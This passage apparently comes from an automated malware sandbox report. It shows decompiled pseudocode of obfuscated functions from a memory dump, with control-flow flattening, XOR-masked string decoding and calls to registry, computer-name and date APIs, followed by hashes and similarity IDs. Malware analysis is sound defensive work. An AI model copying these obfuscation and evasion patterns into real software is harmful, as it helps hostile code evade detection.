								_t148 = _v96;
								continue;
							}
							if(_t69 == 0xe6671123) {
								_t69 =  !=  ? 0x9491a652 : 0x1c0ab71e;
								continue;
							}
							if(_t69 != 0xf11b687f) {
								continue;
							}
							L29:
							_t69 = 0xd22e7491;
							continue;
						}
						if(_t69 > 0x38db78b6) {
							if(_t69 == 0x38db78b7) {
								r13d = 0;
								r14d = 0;
								_t69 = r15d;
								continue;
							}
							if(_t69 != 0x5c7553b0) {
								continue;
							}
							_v80 = _t147;
							_v72 = _t148;
							_v176 = 0;
							_v172 = 0x4cf804b1;
							_v168 = 0x5dec0a95;
							_v164 = 0x38ed4ebe;
							if(_v176 != 0) {
								L25:
								E00B8020E(_t123, _v152,  &_v172, _v88, _t146);
								r8d = 0x6e0c8ed2;
								r9d = 0xd6;
								E00B7FAD7(2, _t108, _t123, _v152);
								_t41 =  &_v160; // 0xf11b68c7
								_v200 = _t41;
								r8d = 0;
								r9d = 0x20019; // executed
								RegOpenKeyExA(??, ??, ??, ??, ??); // executed
								_t131 = _v152;
								E00B7CC2E(_t123, _t131);
								_t69 =  ==  ? 0xc40b2334 : 0xbedb4fc6;
								continue;
							}
							do {
								 *(_t144 + 0x38 + _t123 * 4) = ( *(_t144 + 0x38 + _t123 * 4) & 0xfeab8f08 |  !( *(_t144 + 0x38 + _t123 * 4)) & 0x015470f7) ^ 0x39ca1b15;
								_t131 = _t131 + 1;
								_t123 = _t123 + 1;
							} while (_t123 != 4);
							goto L25;
						} else {
							if(_t69 == 0xf83e1c76) {
								 *((intOrPtr*)(_t140 + 0x664)) = _v180;
								_t69 = 0xf11b687f;
							} else {
								if(_t69 == 0x1c0ab71e) {
									_t69 = r12d;
								}
							}
							continue;
						}
					}
					if(_t69 <= 0xbda386b9) {
						if(_t69 == 0x8f6e5d8a) {
							goto L29;
						}
						if(_t69 == 0x9491a652) {
							 *((intOrPtr*)(_t140 + 0x638)) = _v180;
							_t69 = 0xf11b687f;
						} else {
							if(_t69 == 0xa8bc8896) {
								 *((short*)(_t140 + 0x5d2)) = 0;
								_v180 =  *((intOrPtr*)(_t140 + 0x638));
								_t69 = 0x5c7553b0;
								_t147 = _v120;
								_t148 = _v112;
							}
						}
						continue;
					}
					if(_t69 > 0xc40b2333) {
						if(_t69 == 0xc40b2334) {
							r8d = 0xbdd87e1e;
							r9d = 0xde;
							E00B7FAD7(2, _t108, _t123, _t131);
							_t60 =  &_v180; // 0xf11b68b3
							_v192 = _t60;
							_v200 = _v72;
							r8d = 0;
							r9d = 0;
							 *_t123();
							r8d = 0x96bc22d6;
							r9d = 0xe0;
							E00B7FAD7(2, _t108, _t123, _v160);
							_t131 = _v160;
							 *_t123();
							_t69 =  ==  ? 0xe6671123 : 0x8f6e5d8a;
							continue;
						}
						if(_t69 != 0xd22e7491) {
							continue;
						}
						return _t69;
					}
					if(_t69 == 0xbda386ba) {
						_v181 = _v140 == 1;
						_t69 =  !=  ? 0xa8bc8896 : 0x38db78b7;
						continue;
					}
					if(_t69 != 0xbedb4fc6) {
						continue;
					}
					goto L29;
				}
			}

































                                                                                                                                                        0x00b77b43
                                                                                                                                                        0x00b77b4f
                                                                                                                                                        0x00b77b56
                                                                                                                                                        0x00b77b58
                                                                                                                                                        0x00b77b60
                                                                                                                                                        0x00b77b65
                                                                                                                                                        0x00b77b6a
                                                                                                                                                        0x00b77b6f
                                                                                                                                                        0x00b77b79
                                                                                                                                                        0x00b77b84
                                                                                                                                                        0x00b77b95
                                                                                                                                                        0x00b77ba4
                                                                                                                                                        0x00b77bb3
                                                                                                                                                        0x00b77bbb
                                                                                                                                                        0x00b77bc7
                                                                                                                                                        0x00b77bcd
                                                                                                                                                        0x00b77bd6
                                                                                                                                                        0x00b77bdc
                                                                                                                                                        0x00b77be0
                                                                                                                                                        0x00b77be7
                                                                                                                                                        0x00b77bec
                                                                                                                                                        0x00b77bec
                                                                                                                                                        0x00b77bf3
                                                                                                                                                        0x00b77bf8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77bfd
                                                                                                                                                        0x00b77bfd
                                                                                                                                                        0x00b77c09
                                                                                                                                                        0x00b77c5b
                                                                                                                                                        0x00b77e0b
                                                                                                                                                        0x00b77e1a
                                                                                                                                                        0x00b77e1e
                                                                                                                                                        0x00b77e23
                                                                                                                                                        0x00b77e2b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77e2b
                                                                                                                                                        0x00b77c66
                                                                                                                                                        0x00b77e47
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77e47
                                                                                                                                                        0x00b77c71
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77dcc
                                                                                                                                                        0x00b77dcc
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77dcc
                                                                                                                                                        0x00b77c10
                                                                                                                                                        0x00b77cc5
                                                                                                                                                        0x00b77e63
                                                                                                                                                        0x00b77e66
                                                                                                                                                        0x00b77e69
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77e69
                                                                                                                                                        0x00b77cd0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77cd6
                                                                                                                                                        0x00b77cde
                                                                                                                                                        0x00b77ce8
                                                                                                                                                        0x00b77cec
                                                                                                                                                        0x00b77cf4
                                                                                                                                                        0x00b77cfc
                                                                                                                                                        0x00b77d08
                                                                                                                                                        0x00b77d3d
                                                                                                                                                        0x00b77d4f
                                                                                                                                                        0x00b77d60
                                                                                                                                                        0x00b77d66
                                                                                                                                                        0x00b77d6c
                                                                                                                                                        0x00b77d71
                                                                                                                                                        0x00b77d76
                                                                                                                                                        0x00b77d85
                                                                                                                                                        0x00b77d88
                                                                                                                                                        0x00b77d8e
                                                                                                                                                        0x00b77d93
                                                                                                                                                        0x00b77d98
                                                                                                                                                        0x00b77da9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77da9
                                                                                                                                                        0x00b77d11
                                                                                                                                                        0x00b77d2d
                                                                                                                                                        0x00b77d31
                                                                                                                                                        0x00b77d34
                                                                                                                                                        0x00b77d37
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77c16
                                                                                                                                                        0x00b77c1b
                                                                                                                                                        0x00b77dda
                                                                                                                                                        0x00b77de0
                                                                                                                                                        0x00b77c21
                                                                                                                                                        0x00b77c26
                                                                                                                                                        0x00b77c28
                                                                                                                                                        0x00b77c28
                                                                                                                                                        0x00b77c26
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77c1b
                                                                                                                                                        0x00b77c10
                                                                                                                                                        0x00b77c32
                                                                                                                                                        0x00b77c7d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77c88
                                                                                                                                                        0x00b77e53
                                                                                                                                                        0x00b77e59
                                                                                                                                                        0x00b77c8e
                                                                                                                                                        0x00b77c93
                                                                                                                                                        0x00b77c99
                                                                                                                                                        0x00b77ca8
                                                                                                                                                        0x00b77cac
                                                                                                                                                        0x00b77cb1
                                                                                                                                                        0x00b77cb6
                                                                                                                                                        0x00b77cb6
                                                                                                                                                        0x00b77c93
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77c88
                                                                                                                                                        0x00b77c39
                                                                                                                                                        0x00b77db6
                                                                                                                                                        0x00b77e8d
                                                                                                                                                        0x00b77e93
                                                                                                                                                        0x00b77e99
                                                                                                                                                        0x00b77e9e
                                                                                                                                                        0x00b77ea3
                                                                                                                                                        0x00b77ea8
                                                                                                                                                        0x00b77eb3
                                                                                                                                                        0x00b77eb6
                                                                                                                                                        0x00b77eb9
                                                                                                                                                        0x00b77eca
                                                                                                                                                        0x00b77ed0
                                                                                                                                                        0x00b77ed6
                                                                                                                                                        0x00b77edb
                                                                                                                                                        0x00b77ede
                                                                                                                                                        0x00b77eec
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77eec
                                                                                                                                                        0x00b77dc1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77f11
                                                                                                                                                        0x00b77f11
                                                                                                                                                        0x00b77c44
                                                                                                                                                        0x00b77def
                                                                                                                                                        0x00b77e03
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77e03
                                                                                                                                                        0x00b77c4f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b77c51

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00B7CDB9: RtlAllocateHeap.NTDLL(?,9FD7756B,079849AE,0701B759,?,00B80A77), ref: 00B7CE20
                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,D179479F,A4EA36C8,00000000,?), ref: 00B77D8E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.482142058.0000000000B71000.00000020.00000001.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.482132217.0000000000B70000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.482167503.0000000000B84000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.482175737.0000000000B87000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeapOpen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4287083251-0
                                                                                                                                                        • Opcode ID: 54f65fc0dc1a3516c6086437c921a44873b4ea52fb9af2cb0b0329832b79d16e
                                                                                                                                                        • Instruction ID: b567e8bc68454e2712fdbd685efa79a2c77828536346dca914c3e968a7e8b1c9
                                                                                                                                                        • Opcode Fuzzy Hash: 54f65fc0dc1a3516c6086437c921a44873b4ea52fb9af2cb0b0329832b79d16e
                                                                                                                                                        • Instruction Fuzzy Hash: 4081097231D78086DB64CB29E49076EB7E0F388B54F548066EBADC7B58DF38C8618B41
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00B7D1C4, Relevance: 1.7, APIs: 1, Instructions: 153COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                        			E00B7D1C4(intOrPtr __rcx, intOrPtr __rdx) {
				char _v68;
				char _v72;
				void* _v80;
				long long _v88;
				void* _v96;
				signed long long _v104;
				void* _v112;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				char _v129;
				void* _t47;
				void* _t81;
				signed long long _t88;
				long long* _t90;
				intOrPtr* _t94;
				signed long long _t96;
				intOrPtr _t106;
				signed long long* _t108;
				intOrPtr _t110;
				long long _t111;
				long long _t112;
				long long _t113;

				_t108 =  &_v104;
				_t110 = __rdx;
				_t106 = __rcx;
				_t94 =  &_v68;
				_v96 = _t94;
				_t88 = _v96;
				 *_t94 = 0x14;
				r13d = 0;
				r8d = 0x913338ad;
				r9d = 0x74;
				E00B7FAD7(1, _t81, _t88, __rcx);
				_t98 = __rcx;
				GetComputerNameA(??, ??); // executed
				_v129 =  *((intOrPtr*)(__rcx));
				_t96 =  &_v128 | _t88;
				_t47 = 0x72f0bc31;
				_t112 =  &_v72;
				_t113 =  &_v112;
				L1:
				while(_t47 > 0x31a4f3ac) {
					if(_t47 > 0x368c7021) {
						if(_t47 == 0x368c7022) {
							_v88 = _t112;
							_v80 = _t113;
							_t90 = _v80;
							_v112 = _t111;
							r8d = 0x8ece2d00;
							r9d = 0x209;
							E00B7FAD7(0xa, _t81, _t90, _t98);
							 *_t90(); // executed
							_t88 = _v112;
							_v104 = _t88;
							_t47 =  ==  ? 0x31a4f3ad : 0x2d657e6;
						} else {
							if(_t47 == 0x72f0bc31) {
								_t47 =  ==  ? 0x900af59d : 0x368c7022;
							}
						}
						continue;
					}
					if(_t47 == 0x31a4f3ad) {
						_v128 = r13b;
						_v124 = 0x21a85fec;
						_v120 = 0x73bf45ed;
						if(_v128 != r13b) {
							L16:
							_t98 = _t110;
							r8d = 8;
							E00B7C96E(_t47, _t110, _t96);
							_t47 = 0x134a0c57;
							continue;
						}
						do {
							 *(_t108 + 0x2c + _t88 * 4) =  *(_t108 + 0x2c + _t88 * 4) & 0x8c10ef5d |  !( *(_t108 + 0x2c + _t88 * 4)) & 0x73ef10a2;
							_t47 = 1;
						} while (_t88 == 0);
						goto L16;
					} else {
						if(_t47 == 0x31fa4db0) {
							E00B7C3D4(_v104, _t110);
							r8d = 0xd4d62162;
							r9d = 0x208;
							E00B7FAD7(0xa, _t81, _t88, _v104);
							_t98 = _v112;
							 *_t88();
							_t47 = 0x134a0c57;
						}
						continue;
					}
				}
				if(_t47 == 0x900af59d) {
					_v128 = r13b;
					_v124 = 0x73bca5c0;
					_v120 = 0x32f8abda;
					if(_v128 != r13b) {
						L20:
						_t98 = _t106;
						r8d = 7;
						E00B7C96E(_t47, _t106, _t96);
						_t47 = 0x368c7022;
						goto L1;
					}
					do {
						 *(_t108 + 0x2c + _t88 * 4) = ( *(_t108 + 0x2c + _t88 * 4) & 0x9ec2c1cc |  !( *(_t108 + 0x2c + _t88 * 4)) & 0x613d3e33) ^ 0x53c5d4bd;
						_t47 = 1;
					} while (_t88 == 0);
					goto L20;
				}
				if(_t47 == 0x2d657e6) {
					_t88 = _v104;
					_t47 =  ==  ? 0x31a4f3ad : 0x31fa4db0;
					goto L1;
				}
				if(_t47 != 0x134a0c57) {
					goto L1;
				}
				return _t47;
			}


























                                                                                                                                                        0x00b7d1d0
                                                                                                                                                        0x00b7d1d4
                                                                                                                                                        0x00b7d1d7
                                                                                                                                                        0x00b7d1da
                                                                                                                                                        0x00b7d1df
                                                                                                                                                        0x00b7d1e4
                                                                                                                                                        0x00b7d1e9
                                                                                                                                                        0x00b7d1ef
                                                                                                                                                        0x00b7d1f9
                                                                                                                                                        0x00b7d1ff
                                                                                                                                                        0x00b7d205
                                                                                                                                                        0x00b7d20a
                                                                                                                                                        0x00b7d210
                                                                                                                                                        0x00b7d214
                                                                                                                                                        0x00b7d222
                                                                                                                                                        0x00b7d225
                                                                                                                                                        0x00b7d22f
                                                                                                                                                        0x00b7d234
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7d239
                                                                                                                                                        0x00b7d245
                                                                                                                                                        0x00b7d2b6
                                                                                                                                                        0x00b7d3b4
                                                                                                                                                        0x00b7d3be
                                                                                                                                                        0x00b7d3c3
                                                                                                                                                        0x00b7d3c8
                                                                                                                                                        0x00b7d3d4
                                                                                                                                                        0x00b7d3da
                                                                                                                                                        0x00b7d3e0
                                                                                                                                                        0x00b7d3ed
                                                                                                                                                        0x00b7d3ef
                                                                                                                                                        0x00b7d3f4
                                                                                                                                                        0x00b7d403
                                                                                                                                                        0x00b7d2bc
                                                                                                                                                        0x00b7d2c1
                                                                                                                                                        0x00b7d2d6
                                                                                                                                                        0x00b7d2d6
                                                                                                                                                        0x00b7d2c1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7d2b6
                                                                                                                                                        0x00b7d24c
                                                                                                                                                        0x00b7d2de
                                                                                                                                                        0x00b7d2e3
                                                                                                                                                        0x00b7d2eb
                                                                                                                                                        0x00b7d2f8
                                                                                                                                                        0x00b7d320
                                                                                                                                                        0x00b7d320
                                                                                                                                                        0x00b7d326
                                                                                                                                                        0x00b7d32c
                                                                                                                                                        0x00b7d331
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7d331
                                                                                                                                                        0x00b7d2fc
                                                                                                                                                        0x00b7d312
                                                                                                                                                        0x00b7d319
                                                                                                                                                        0x00b7d319
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7d252
                                                                                                                                                        0x00b7d257
                                                                                                                                                        0x00b7d261
                                                                                                                                                        0x00b7d272
                                                                                                                                                        0x00b7d278
                                                                                                                                                        0x00b7d27e
                                                                                                                                                        0x00b7d283
                                                                                                                                                        0x00b7d286
                                                                                                                                                        0x00b7d288
                                                                                                                                                        0x00b7d288
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7d257
                                                                                                                                                        0x00b7d24c
                                                                                                                                                        0x00b7d294
                                                                                                                                                        0x00b7d33b
                                                                                                                                                        0x00b7d340
                                                                                                                                                        0x00b7d348
                                                                                                                                                        0x00b7d355
                                                                                                                                                        0x00b7d383
                                                                                                                                                        0x00b7d383
                                                                                                                                                        0x00b7d389
                                                                                                                                                        0x00b7d38f
                                                                                                                                                        0x00b7d394
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7d394
                                                                                                                                                        0x00b7d359
                                                                                                                                                        0x00b7d375
                                                                                                                                                        0x00b7d37c
                                                                                                                                                        0x00b7d37c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7d359
                                                                                                                                                        0x00b7d29f
                                                                                                                                                        0x00b7d39e
                                                                                                                                                        0x00b7d3ac
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7d3ac
                                                                                                                                                        0x00b7d2aa
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7d42a

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.482142058.0000000000B71000.00000020.00000001.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.482132217.0000000000B70000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.482167503.0000000000B84000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.482175737.0000000000B87000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ComputerName
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3545744682-0
                                                                                                                                                        • Opcode ID: 3c3e849541630cc18eba3320f716b724929dd22066de87ccf0355ed67c512196
                                                                                                                                                        • Instruction ID: 6c692887afe9ce26b6382302466bd404ea45467f18df9c10148e79bac7b0c1dc
                                                                                                                                                        • Opcode Fuzzy Hash: 3c3e849541630cc18eba3320f716b724929dd22066de87ccf0355ed67c512196
                                                                                                                                                        • Instruction Fuzzy Hash: 25511C2230864486CA248B5AF45461FFBB0F7897C4F58815AFF9E87B69CA3DC846DB05
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00B7C450, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 15%
                                                                                                                                                        			E00B7C450(signed long long __rax, long long __rcx) {
				char _v52;
				char _v72;
				intOrPtr _v80;
				long long _v88;
				int _t23;
				void* _t39;
				signed long long _t44;
				char* _t46;
				intOrPtr* _t47;
				long long _t48;
				void* _t49;

				_t44 = __rax;
				_t48 = __rcx;
				r8d = 0xe249a58d;
				r9d = 0xac;
				E00B7FAD7(1, _t39, __rax, __rcx);
				_t46 =  &_v72;
				 *_t44();
				_t47 =  &_v52;
				 *((char*)(_t47 - 4)) = 0;
				 *_t47 = 0x32816739;
				 *((intOrPtr*)(_t47 + 4)) = 0x32816739;
				 *((intOrPtr*)(_t47 + 8)) = 0x32b5676d;
				 *((intOrPtr*)(_t47 + 0xc)) = 0x32d5670d;
				 *((intOrPtr*)(_t47 + 0x10)) = 0x329c6724;
				 *((intOrPtr*)(_t47 + 0x14)) = 0x32f86740;
				if( *((intOrPtr*)(_t47 - 4)) == 0) {
					do {
						 *(_t49 + 0x40 + _t44 * 4) =  *(_t49 + 0x40 + _t44 * 4) & 0xcd0798bf |  !( *(_t49 + 0x40 + _t44 * 4)) & 0x32f86740;
						_t46 = _t46 + 1;
						_t44 = _t44 + 1;
					} while (_t44 != 7);
				}
				r8d = 0xc87545f4;
				r9d = 0xcc;
				E00B7FAD7(1, _t39, _t44, _t46);
				_v88 = _t48;
				_v80 = 0xc;
				_t23 = GetDateFormatW(??, ??, ??, ??, ??, ??); // executed
				return _t23;
			}














                                                                                                                                                        0x00b7c450
                                                                                                                                                        0x00b7c457
                                                                                                                                                        0x00b7c463
                                                                                                                                                        0x00b7c469
                                                                                                                                                        0x00b7c46f
                                                                                                                                                        0x00b7c474
                                                                                                                                                        0x00b7c479
                                                                                                                                                        0x00b7c47b
                                                                                                                                                        0x00b7c480
                                                                                                                                                        0x00b7c488
                                                                                                                                                        0x00b7c48a
                                                                                                                                                        0x00b7c48d
                                                                                                                                                        0x00b7c494
                                                                                                                                                        0x00b7c49b
                                                                                                                                                        0x00b7c4a2
                                                                                                                                                        0x00b7c4ac
                                                                                                                                                        0x00b7c4b5
                                                                                                                                                        0x00b7c4cb
                                                                                                                                                        0x00b7c4cf
                                                                                                                                                        0x00b7c4d2
                                                                                                                                                        0x00b7c4d5
                                                                                                                                                        0x00b7c4b5
                                                                                                                                                        0x00b7c4e2
                                                                                                                                                        0x00b7c4e8
                                                                                                                                                        0x00b7c4ee
                                                                                                                                                        0x00b7c4f3
                                                                                                                                                        0x00b7c4f8
                                                                                                                                                        0x00b7c50f
                                                                                                                                                        0x00b7c519

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.482142058.0000000000B71000.00000020.00000001.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.482132217.0000000000B70000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.482167503.0000000000B84000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.482175737.0000000000B87000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DateFormat
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2793631785-0
                                                                                                                                                        • Opcode ID: 50378c0f2bcc1f64eda8536ac104d2ffe73bbeeb79143c7527775f7fd14e6f08
                                                                                                                                                        • Instruction ID: 0e9ae8d35b1ca7422a1aa730ff5dfb3177fc0e485c2bec042cb43e26703b8293
                                                                                                                                                        • Opcode Fuzzy Hash: 50378c0f2bcc1f64eda8536ac104d2ffe73bbeeb79143c7527775f7fd14e6f08
                                                                                                                                                        • Instruction Fuzzy Hash: CF1123B23242849BE718DF15F300A5EAAA0F3A4344F04C179DB5947B44CB38D5628B00
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Non-executed Functions